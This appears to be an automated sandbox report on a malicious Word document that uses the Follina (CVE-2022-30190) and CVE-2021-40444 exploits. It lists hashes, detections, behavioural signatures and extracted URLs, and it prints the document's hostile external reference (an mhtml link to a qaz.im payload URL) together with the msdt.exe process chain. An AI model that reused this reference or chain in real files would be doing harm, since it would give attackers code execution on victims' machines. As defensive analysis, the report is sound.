Windows Analysis Report
nnxPt0Yydv.doc

Overview

General Information

Sample Name: nnxPt0Yydv.doc
Analysis ID: 696518
MD5: 15b691f0c5d627e71fed8a5d34fb0328
SHA1: 1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256: 3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
Tags: CVE-2022-30190docFollina
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

AV Detection

barindex
Source: nnxPt0Yydv.doc Avira: detected
Source: nnxPt0Yydv.doc ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc Virustotal: Detection: 48% Perma Link

Exploits

barindex
Source: Yara match File source: 00000006.00000002.447437420.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.448016935.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.447494633.0000000003670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: document.xml.rels Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Source: Joe Sandbox View IP Address: 52.109.88.191 52.109.88.191
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: msdt.exe, 00000006.00000002.448879408.0000000003852000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: csc.exe, 0000001B.00000002.458025421.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microft.com/fwlink/?LinkID=533240m
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.aadrm.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.cortana.ai
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.office.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.onedrive.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://api.scheduler.
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://augloop.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cdn.entity.
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cortana.ai
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cortana.ai/api
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://cr.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://directory.services.
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://graph.windows.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://graph.windows.net/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://invites.office.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://login.windows.local
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://management.azure.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://management.azure.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://messaging.office.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://officeapps.live.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://onedrive.live.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://osi.office.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://outlook.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://outlook.office.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://outlook.office365.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: ~WRS{1A0DB0AC-87DC-4DEC-A674-7E6F96317877}.tmp.0.dr String found in binary or memory: https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://roaming.edog.
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://settings.outlook.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://tasks.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://wus2.pagecontentsync.
